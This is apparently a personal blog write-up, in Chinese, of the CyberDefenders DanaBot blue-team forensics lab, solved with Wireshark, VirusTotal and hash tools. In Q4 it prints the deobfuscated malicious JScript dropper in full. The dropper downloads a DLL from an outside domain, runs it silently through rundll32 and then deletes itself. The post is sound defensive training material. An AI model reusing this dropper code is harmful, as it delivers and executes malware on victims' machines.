459 words
2 minutes
DanaBot Lab
2025-08-02
2025-08-03
CyberDefenders
CyberDefenders
/
Blue Team CTF

跟鯨魚諮詢完之後知道有 blue team ctf (再次謝謝鯨魚)
不能白問,挑我最喜歡的看封包 lab 練一下
甚麼時候換題目類型…看心情 xd

DanaBot Lab#

Lab 連結

Q1#

在封包中看到 portfolio.serveirc.com ,用 VirusTotal 查詢這個 domain

在 wireshark 裡面看到關於 portfolio.serveirc.com 的其中一條出現 ip

所以初始存取的 ip 是 62.173.142.148

Note: 可以用 VirusTotal 去確認一個網站的信譽

Q2#

在第一次登入看到混淆過的 JavaScript 程式碼,先用線上工具看看能不能解混淆

根據解混淆後的程式碼,可以知道應該是使用了.dll 並 random 了 10 個字母作為檔案名稱
(看起來像是下一題的部分)

然後再仔細看一眼封包,就發現檔案名稱是allegato_708.js

Q3#

File > Export Objects > HTTP 找到第一個惡意程式,用 sha256sum 可以找到 SHA-256 hash

Terminal window
sha256sum login.php

Q4#

Windows 系統執行 .js 檔案是由內建的 wscript.exe 或是 cscript.exe 負責執行的

function _0x414360(_0x5c5160) {
  var _0x119065 = "";
  var _0x5a393f = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".length;
  for (var _0x3d45b7 = 0x0; _0x3d45b7 < _0x5c5160; _0x3d45b7++) {
    _0x119065 += "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".charAt(
      Math.floor(Math.random() * _0x5a393f)
    );
  }
  return _0x119065 + ".dll";
}
var _0x48a85a = _0x414360(0xa);
var _0x44bdd9 =
  new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(0x2) +
  "\\" +
  _0x48a85a;
var _0x5da57f = WScript.CreateObject("MSXML2.XMLHTTP");
_0x5da57f.Open("GET", "http://soundata.top/resources.dll", false);
_0x5da57f.Send();
if (_0x5da57f.Status == 0xc8) {
  var _0x3c8952 = WScript.CreateObject("ADODB.Stream");
  _0x3c8952.Open();
  _0x3c8952.Type = 0x1;
  _0x3c8952.Write(_0x5da57f.ResponseBody);
  _0x3c8952.Position = 0x0;
  _0x3c8952.SaveToFile(_0x44bdd9, 0x2);
  _0x3c8952.Close();
  var _0x1e16b0 = WScript.CreateObject("Wscript.Shell");
  _0x1e16b0.Run("rundll32.exe /B " + _0x44bdd9 + ",start", 0x0, true);
}
new ActiveXObject("Scripting.FileSystemObject").DeleteFile(
  WScript.ScriptFullName
);

Wscript.Shell 可以看出是用 wscript.exe 來執行的

Q5#

GET /resources.dll 裡有一行 This program cannot be run in DOS mode. ,然後接下來就是很多的 DoS 紀錄

所以第二個惡意程式的檔案副檔名就是 .dll

Q6#

最後用 md5sum 可以找到 MD5 hash

Terminal window
md5sum resources.dll
I successfully completed DanaBot Blue Team Lab at @CyberDefenders!
https://cyberdefenders.org/blueteam-ctf-challenges/achievements/n1ght0w1/danabot/


#CyberDefenders #CyberSecurity #BlueYard #BlueTeam #InfoSec #SOC #SOCAnalyst #DFIR #CCD #CyberDefender

工具#

VirusTotal 可以確認 IP 的信譽

Obfuscator.io Deobfuscator 解 JavaScript 混淆

# synchrony 解 JavaScript 混淆

AIS3 新型態資安暑期課程 2025
PortSwigger 練習紀錄
© 2025 n1ght0w1. All Rights Reserved. /
Powered by Astro & Fuwari